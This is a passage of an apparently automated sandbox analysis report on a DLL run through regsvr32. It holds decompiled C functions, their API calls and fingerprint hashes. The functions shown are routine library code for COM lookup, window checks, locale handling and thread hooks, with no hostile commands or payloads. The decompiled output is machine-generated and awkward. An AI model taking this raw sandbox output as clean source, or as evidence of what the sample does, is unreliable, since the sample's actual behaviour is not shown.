                                                                                                                						__eflags =  *((intOrPtr*)(_t57 - 0x18));
                                                                                                                						if( *((intOrPtr*)(_t57 - 0x18)) != 0) {
                                                                                                                							_push( *((intOrPtr*)(_t57 - 0x1c)));
                                                                                                                							_push(0);
                                                                                                                							E1001D714();
                                                                                                                						}
                                                                                                                						_t39 =  *((intOrPtr*)(_t57 + 8));
                                                                                                                					} else {
                                                                                                                						_t43 = E1000B0A9(_t47, 0, _t56, __eflags,  *_t47 & 0x0000ffff,  *((intOrPtr*)(_t57 + 0x10)), _t36);
                                                                                                                						 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
                                                                                                                						__eflags = _t43;
                                                                                                                						if(_t43 != 0) {
                                                                                                                							__eflags =  *((intOrPtr*)(_t57 - 0x18));
                                                                                                                							if( *((intOrPtr*)(_t57 - 0x18)) != 0) {
                                                                                                                								_push( *((intOrPtr*)(_t57 - 0x1c)));
                                                                                                                								_push(0);
                                                                                                                								E1001D714();
                                                                                                                							}
                                                                                                                							_t39 = 0;
                                                                                                                						} else {
                                                                                                                							__eflags =  *((intOrPtr*)(_t57 - 0x18));
                                                                                                                							if( *((intOrPtr*)(_t57 - 0x18)) == 0) {
                                                                                                                								goto L4;
                                                                                                                							} else {
                                                                                                                								_push( *((intOrPtr*)(_t57 - 0x1c)));
                                                                                                                								_push(0);
                                                                                                                								goto L3;
                                                                                                                							}
                                                                                                                							L18:
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
                                                                                                                					if( *((intOrPtr*)(_t57 - 0x18)) != 0) {
                                                                                                                						_push( *((intOrPtr*)(_t57 - 0x1c)));
                                                                                                                						_push(0);
                                                                                                                						L3:
                                                                                                                						E1001D714();
                                                                                                                					}
                                                                                                                					L4:
                                                                                                                					_t39 = 0x80040064;
                                                                                                                				}
                                                                                                                				return E10047725(_t39);
                                                                                                                				goto L18;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3_catch_memset
                                                                                                                • String ID: d
                                                                                                                • API String ID: 1022661273-2564639436
                                                                                                                • Opcode ID: b9e012aa01af075eff093844a8ffeee4cf2b831100157110da877549c92efa64
                                                                                                                • Instruction ID: f21327fa9afeab172bd533079007e35d76d7159773825f99a2a971ae6053a1df
                                                                                                                • Opcode Fuzzy Hash: b9e012aa01af075eff093844a8ffeee4cf2b831100157110da877549c92efa64
                                                                                                                • Instruction Fuzzy Hash: E9218D30A00649EBCF11DFA4C881AEE7BB6EF04354F324625F560EA091D735DA91DB69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10029E28(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t21;
                                                                                                                				struct HINSTANCE__* _t25;
                                                                                                                				_Unknown_base(*)()* _t26;
                                                                                                                				void* _t29;
                                                                                                                				signed int* _t48;
                                                                                                                				void* _t49;
                                                                                                                				void* _t50;
                                                                                                                				void* _t51;
                                                                                                                
                                                                                                                				_t51 = __eflags;
                                                                                                                				_t44 = __edx;
                                                                                                                				_t34 = __ebx;
                                                                                                                				_push(4);
                                                                                                                				E1004764D(0x1008ff93, __ebx, __edi, __esi);
                                                                                                                				_t48 =  *(_t50 + 0x10);
                                                                                                                				 *_t48 =  *_t48 & 0x00000000;
                                                                                                                				E10029D24(__ebx, __edx, __edi, _t51, _t50 - 0x10,  *((intOrPtr*)(_t50 + 8)));
                                                                                                                				 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
                                                                                                                				_t21 = E100184C0();
                                                                                                                				_t35 = _t50 + 0x10;
                                                                                                                				L1000140B(_t50 + 0x10, _t21);
                                                                                                                				 *(_t50 - 4) = 1;
                                                                                                                				if(E100296B0(__ebx,  *((intOrPtr*)(_t50 - 0x10)), _t50 + 0x10) != 0) {
                                                                                                                					_t46 =  *(_t50 + 0x10);
                                                                                                                					_push( *(_t50 + 0x10));
                                                                                                                					_t25 = E10012699(_t34, _t35,  *(_t50 + 0x10), _t48, __eflags);
                                                                                                                					__eflags = _t25;
                                                                                                                					if(_t25 != 0) {
                                                                                                                						_t26 = GetProcAddress(_t25, "DllGetClassObject");
                                                                                                                						__eflags = _t26;
                                                                                                                						if(_t26 == 0) {
                                                                                                                							_t49 = 0x800401f9;
                                                                                                                						} else {
                                                                                                                							_t49 =  *_t26( *((intOrPtr*)(_t50 + 8)),  *((intOrPtr*)(_t50 + 0xc)), _t48);
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t49 = 0x80040154;
                                                                                                                					}
                                                                                                                					L100013E3(_t46 - 0x10, _t44);
                                                                                                                					L100013E3( *((intOrPtr*)(_t50 - 0x10)) + 0xfffffff0, _t44);
                                                                                                                					_t29 = _t49;
                                                                                                                				} else {
                                                                                                                					L100013E3( &(( *(_t50 + 0x10))[0xfffffffffffffffc]), __edx);
                                                                                                                					L100013E3( *((intOrPtr*)(_t50 - 0x10)) + 0xfffffff0, __edx);
                                                                                                                					_t29 = 0x80040154;
                                                                                                                				}
                                                                                                                				return E10047725(_t29);
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10029E2F
                                                                                                                  • Part of subcall function 10029D24: _swprintf.LIBCMT ref: 10029D8A
                                                                                                                  • Part of subcall function 100296B0: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 100296E8
                                                                                                                  • Part of subcall function 100296B0: RegOpenKeyA.ADVAPI32(?,?,?), ref: 100296FC
                                                                                                                  • Part of subcall function 100296B0: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 10029717
                                                                                                                  • Part of subcall function 100296B0: RegQueryValueExA.ADVAPI32 ref: 10029731
                                                                                                                  • Part of subcall function 100296B0: RegCloseKey.ADVAPI32(?), ref: 10029741
                                                                                                                  • Part of subcall function 100296B0: RegCloseKey.ADVAPI32(?), ref: 10029746
                                                                                                                  • Part of subcall function 100296B0: RegCloseKey.ADVAPI32(?), ref: 1002974B
                                                                                                                • GetProcAddress.KERNEL32(00000000,DllGetClassObject,00000000,00000004,10029F08,?,100A592C,00000000), ref: 10029EBF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen$AddressH_prolog3ProcQueryValue_swprintf
                                                                                                                • String ID: DllGetClassObject
                                                                                                                • API String ID: 2239898804-1075368562
                                                                                                                • Opcode ID: 9008d4399bc21897604654863b1c71837f69836ba958acecc525d96e6063ee5b
                                                                                                                • Instruction ID: b806fbc304eb1717afb72819c6f168350187bc08b8103b5c1930cd9a947c6215
                                                                                                                • Opcode Fuzzy Hash: 9008d4399bc21897604654863b1c71837f69836ba958acecc525d96e6063ee5b
                                                                                                                • Instruction Fuzzy Hash: FD118F79900256ABDF00DFA0CC41BAE37A4FF403A4F550528B924A72E2DB74A910D7A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1003F90E(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				struct HWND__* _v52;
                                                                                                                				unsigned int _v76;
                                                                                                                				intOrPtr _v80;
                                                                                                                				char _v84;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr* _t16;
                                                                                                                				signed int _t19;
                                                                                                                				signed int _t30;
                                                                                                                				void* _t35;
                                                                                                                				void* _t36;
                                                                                                                				intOrPtr* _t37;
                                                                                                                
                                                                                                                				_t37 = __ecx;
                                                                                                                				_t36 = E10013F46(__ebx, __ecx, _t35, __eflags);
                                                                                                                				_t39 = _t36;
                                                                                                                				if(_t36 != 0) {
                                                                                                                					_v84 = 0x50;
                                                                                                                					_v80 = 0x11;
                                                                                                                					 *((intOrPtr*)( *_t37 + 0x110))(0x41d, _a4,  &_v84);
                                                                                                                					_t16 = E100203C2(0x1009e47c, E10014011(_t37, _t36, _t37, _t39, _v52));
                                                                                                                					if(_t16 == 0) {
                                                                                                                						_t19 = GetWindowLongA(_v52, 0xfffffff0) >> 0x0000001c & 0x00000001;
                                                                                                                						__eflags = _t19;
                                                                                                                					} else {
                                                                                                                						_t19 =  *((intOrPtr*)( *_t16 + 0x154))();
                                                                                                                					}
                                                                                                                					_t30 =  !(_v76 >> 3) & 0x00000001;
                                                                                                                					if(_t19 != _t30) {
                                                                                                                						asm("sbb ecx, ecx");
                                                                                                                						ShowWindow(_v52,  ~_t30 & 0x00000005);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t36;
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 1003F971
                                                                                                                • ShowWindow.USER32(?,?), ref: 1003F997
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$LongShow
                                                                                                                • String ID: P
                                                                                                                • API String ID: 2659037557-3110715001
                                                                                                                • Opcode ID: 1ab7d56d4179d4e8b5d6a0f99de9d15fc7cca27e39cc9b254fc4de0f0fc89069
                                                                                                                • Instruction ID: 9d75cb92e2a5c536025ce107791e61cda28db8ead2f2e4480c91a0b11d871f17
                                                                                                                • Opcode Fuzzy Hash: 1ab7d56d4179d4e8b5d6a0f99de9d15fc7cca27e39cc9b254fc4de0f0fc89069
                                                                                                                • Instruction Fuzzy Hash: C801C435620114AFDB099B64CC4AAFE7BB5EF44711F05022DF592DA195DB749844CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E10019B8F(void* __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v16;
                                                                                                                				char _v18;
                                                                                                                				char _v280;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t11;
                                                                                                                				long _t14;
                                                                                                                				intOrPtr _t15;
                                                                                                                				char* _t18;
                                                                                                                				intOrPtr _t21;
                                                                                                                				intOrPtr _t33;
                                                                                                                				signed int _t36;
                                                                                                                
                                                                                                                				_t11 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t11 ^ _t36;
                                                                                                                				_t35 = 0x104;
                                                                                                                				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
                                                                                                                				if(_t14 == 0 || _t14 == 0x104) {
                                                                                                                					L4:
                                                                                                                					_t15 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                				} else {
                                                                                                                					_t18 = PathFindExtensionA( &_v280);
                                                                                                                					_t35 = "%s.dll";
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsw");
                                                                                                                					_t32 =  &_v280;
                                                                                                                					_t41 = _t18 -  &_v280 + 7 - 0x106;
                                                                                                                					asm("movsb");
                                                                                                                					_t33 = _t33;
                                                                                                                					if(_t18 -  &_v280 + 7 > 0x106) {
                                                                                                                						goto L4;
                                                                                                                					} else {
                                                                                                                						E10019530(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
                                                                                                                						_t15 = E100198A8(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E1004763E(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10019BB5
                                                                                                                • PathFindExtensionA.SHLWAPI(?), ref: 10019BCB
                                                                                                                  • Part of subcall function 10019530: _strcpy_s.LIBCMT ref: 1001953C
                                                                                                                  • Part of subcall function 100198A8: __EH_prolog3.LIBCMT ref: 100198C7
                                                                                                                  • Part of subcall function 100198A8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 100198E8
                                                                                                                  • Part of subcall function 100198A8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 100198F9
                                                                                                                  • Part of subcall function 100198A8: ConvertDefaultLocale.KERNEL32(?), ref: 1001992F
                                                                                                                  • Part of subcall function 100198A8: ConvertDefaultLocale.KERNEL32(?), ref: 10019937
                                                                                                                  • Part of subcall function 100198A8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1001994B
                                                                                                                  • Part of subcall function 100198A8: ConvertDefaultLocale.KERNEL32(?), ref: 1001996F
                                                                                                                  • Part of subcall function 100198A8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10019975
                                                                                                                  • Part of subcall function 100198A8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 100199AE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                • String ID: %s.dll
                                                                                                                • API String ID: 3444012488-3668843792
                                                                                                                • Opcode ID: cea5404daed0731a6b219cd8afe4b1a0dd88c16b486085c71d9734a1623cfebb
                                                                                                                • Instruction ID: 0b7e9202130163ae395afdc0551c1bbeafcf20f4336e4298d0e5f786ec062517
                                                                                                                • Opcode Fuzzy Hash: cea5404daed0731a6b219cd8afe4b1a0dd88c16b486085c71d9734a1623cfebb
                                                                                                                • Instruction Fuzzy Hash: FB019675A00118ABDB18DBB4DD569EEB3F9EB44B00F0101B9A902D7141EA74EA84CAA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 51%
                                                                                                                			E1003F023(void* __ecx, void* __edi) {
                                                                                                                				signed short _v16;
                                                                                                                				signed short _v20;
                                                                                                                				char _v24;
                                                                                                                				void* __ebx;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t7;
                                                                                                                				void* _t18;
                                                                                                                				intOrPtr* _t19;
                                                                                                                				void* _t24;
                                                                                                                				signed int _t25;
                                                                                                                
                                                                                                                				_t7 =  *0x100b9b10; // 0xffffffff
                                                                                                                				_t32 = _t7 - 0xffffffff;
                                                                                                                				if(_t7 != 0xffffffff) {
                                                                                                                					return _t7;
                                                                                                                				}
                                                                                                                				_push(_t18);
                                                                                                                				_push(_t24);
                                                                                                                				_t19 = GetProcAddress(E1000F67A( *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t18, __edi, _t24, _t32) + 0x78))))), "DllGetVersion");
                                                                                                                				_t25 = 0x40000;
                                                                                                                				if(_t19 != 0) {
                                                                                                                					E10049170(__edi,  &_v24, 0, 0x14);
                                                                                                                					_push( &_v24);
                                                                                                                					_v24 = 0x14;
                                                                                                                					if( *_t19() >= 0) {
                                                                                                                						_t25 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *0x100b9b10 = _t25;
                                                                                                                				return _t25;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000F67A: GetModuleHandleA.KERNEL32(?,?,10013E00,InitCommonControlsEx,00000000,10014775,00040000,00008000,?,?,1001754E,?,00040000), ref: 1000F686
                                                                                                                  • Part of subcall function 1000F67A: LoadLibraryA.KERNEL32(?), ref: 1000F696
                                                                                                                • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 1003F04A
                                                                                                                • _memset.LIBCMT ref: 1003F063
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc_memset
                                                                                                                • String ID: DllGetVersion
                                                                                                                • API String ID: 3385804498-2861820592
                                                                                                                • Opcode ID: 9b5a934c88ab926237a1358001a910c6e2e6749b50adbe1f8f877cbf1e32a76a
                                                                                                                • Instruction ID: 83cedfc33295a2b91a424a6dec3734a2390b18edd068e67cc7ee030c49faf0e2
                                                                                                                • Opcode Fuzzy Hash: 9b5a934c88ab926237a1358001a910c6e2e6749b50adbe1f8f877cbf1e32a76a
                                                                                                                • Instruction Fuzzy Hash: 64F08175A003295AE701EBFC9C85AAE73E8EB04755F100275FA60F71A2D770DD0487A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E10021BD1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v20;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t7;
                                                                                                                				signed int _t16;
                                                                                                                				intOrPtr _t18;
                                                                                                                				intOrPtr _t23;
                                                                                                                				intOrPtr _t24;
                                                                                                                				struct HWND__* _t25;
                                                                                                                				signed int _t26;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				_t23 = __edx;
                                                                                                                				_t18 = __ebx;
                                                                                                                				_t7 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t7 ^ _t26;
                                                                                                                				_t25 = _a4;
                                                                                                                				if(_t25 != 0) {
                                                                                                                					if((GetWindowLongA(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
                                                                                                                						goto L1;
                                                                                                                					} else {
                                                                                                                						GetClassNameA(_t25,  &_v20, 0xa);
                                                                                                                						_t16 = E1001286D( &_v20, "combobox");
                                                                                                                						asm("sbb eax, eax");
                                                                                                                						_t11 =  ~_t16 + 1;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L1:
                                                                                                                					_t11 = 0;
                                                                                                                				}
                                                                                                                				return E1004763E(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 10021BF0
                                                                                                                • GetClassNameA.USER32(00000000,?,0000000A), ref: 10021C05
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassLongNameWindow
                                                                                                                • String ID: combobox
                                                                                                                • API String ID: 1147815241-2240613097
                                                                                                                • Opcode ID: a21c1ffcec8f1da76df6aac1aacb11c6c99fde7dd74364291cb2495d92a06b95
                                                                                                                • Instruction ID: b712a396dd2164fb9b1ba4218fa7ea712223ec1a3925b5c20f6cf45ffa4882a6
                                                                                                                • Opcode Fuzzy Hash: a21c1ffcec8f1da76df6aac1aacb11c6c99fde7dd74364291cb2495d92a06b95
                                                                                                                • Instruction Fuzzy Hash: F5F0B435915529AFDB01EFB4CC81DEE73BCEB06350B91061AE812E7180DB34F90487D5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E1001A66C(void* __esi, void* __eflags) {
                                                                                                                				void* _t3;
                                                                                                                				void* _t4;
                                                                                                                				struct HHOOK__* _t6;
                                                                                                                				void* _t7;
                                                                                                                				void* _t8;
                                                                                                                
                                                                                                                				_t3 = E1001E302(_t7, _t8, __esi, __eflags);
                                                                                                                				_t13 =  *((char*)(_t3 + 0x14));
                                                                                                                				if( *((char*)(_t3 + 0x14)) == 0) {
                                                                                                                					_push(__esi);
                                                                                                                					_t4 = E1001DD4F(_t7, _t8, __esi, _t13);
                                                                                                                					_t6 = SetWindowsHookExA(0xffffffff, E1001A4D8, 0, GetCurrentThreadId());
                                                                                                                					 *(_t4 + 0x2c) = _t6;
                                                                                                                					return _t6;
                                                                                                                				}
                                                                                                                				return _t3;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1001A67F
                                                                                                                • SetWindowsHookExA.USER32(000000FF,V$>,00000000,00000000), ref: 1001A68F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentHookThreadWindows
                                                                                                                • String ID: V$>
                                                                                                                • API String ID: 1904029216-2039469509
                                                                                                                • Opcode ID: 6bcfa455536766ac0d7911c28b510cea6815940c407937d04ec7f1fe53434717
                                                                                                                • Instruction ID: ed438374310f535bd5856febee57efaef843a1edf130da502d0a4a26ef8a0b4a
                                                                                                                • Opcode Fuzzy Hash: 6bcfa455536766ac0d7911c28b510cea6815940c407937d04ec7f1fe53434717
                                                                                                                • Instruction Fuzzy Hash: 6BD0A7768042606FF711F7706D0DB993AC4DB02320F1D0385F5229E0E2C634D8C04755
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 60%
                                                                                                                			E10020973(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				void* _t31;
                                                                                                                				intOrPtr _t32;
                                                                                                                				signed int _t38;
                                                                                                                				struct _CRITICAL_SECTION* _t39;
                                                                                                                				intOrPtr* _t44;
                                                                                                                				long* _t47;
                                                                                                                				intOrPtr* _t50;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t50 = _a4;
                                                                                                                				_t38 = 1;
                                                                                                                				_t47 = __ecx;
                                                                                                                				_v8 = 1;
                                                                                                                				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
                                                                                                                					L10:
                                                                                                                					_t39 =  &(_t47[7]);
                                                                                                                					EnterCriticalSection(_t39);
                                                                                                                					E100205EA( &(_t47[5]), _t50);
                                                                                                                					LeaveCriticalSection(_t39);
                                                                                                                					LocalFree( *(_t50 + 0xc));
                                                                                                                					 *((intOrPtr*)( *_t50))(1);
                                                                                                                					_t31 = TlsSetValue( *_t47, 0);
                                                                                                                					L11:
                                                                                                                					return _t31;
                                                                                                                				} else {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					L1:
                                                                                                                					_t32 = _a8;
                                                                                                                					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
                                                                                                                						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
                                                                                                                						if(_t44 != 0) {
                                                                                                                							 *((intOrPtr*)( *_t44))(1);
                                                                                                                						}
                                                                                                                						_t31 =  *(_t50 + 0xc);
                                                                                                                						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
                                                                                                                					} else {
                                                                                                                						_t31 =  *(_t50 + 0xc);
                                                                                                                						if( *(_t31 + _t38 * 4) != 0) {
                                                                                                                							_v8 = _v8 & 0x00000000;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t38 = _t38 + 1;
                                                                                                                				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
                                                                                                                				if(_v8 == 0) {
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				goto L10;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 100209D0
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 100209E0
                                                                                                                • LocalFree.KERNEL32(?), ref: 100209E9
                                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 100209FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2949335588-0
                                                                                                                • Opcode ID: ae7b940fcce18e32b92972ffe26dfb51c37e5d792b9645ba6a4d0d9e624cd0c4
                                                                                                                • Instruction ID: a85c05a7aeec6e8a90cd7c592f85a2f889a8b8ae44a3cefc8c347544680011c3
                                                                                                                • Opcode Fuzzy Hash: ae7b940fcce18e32b92972ffe26dfb51c37e5d792b9645ba6a4d0d9e624cd0c4
                                                                                                                • Instruction Fuzzy Hash: C8113735A00705EFE710CF54E984B9AB7A6FF46356F60846AF583871A2CBB1A990CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10021F6C(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
                                                                                                                				void* __edi;
                                                                                                                				struct _CRITICAL_SECTION* _t4;
                                                                                                                				void* _t7;
                                                                                                                				void* _t10;
                                                                                                                				signed int _t11;
                                                                                                                				void* _t14;
                                                                                                                				intOrPtr* _t15;
                                                                                                                				void* _t17;
                                                                                                                
                                                                                                                				_t17 = __ebp;
                                                                                                                				_t14 = __esi;
                                                                                                                				_t7 = __ebx;
                                                                                                                				_t11 = _a4;
                                                                                                                				_t20 = _t11 - 0x11;
                                                                                                                				if(_t11 >= 0x11) {
                                                                                                                					_t4 = E1000A069(__ebx, _t10, _t11, __esi, _t20);
                                                                                                                				}
                                                                                                                				if( *0x100bdcd0 == 0) {
                                                                                                                					_t4 = E10021F03();
                                                                                                                				}
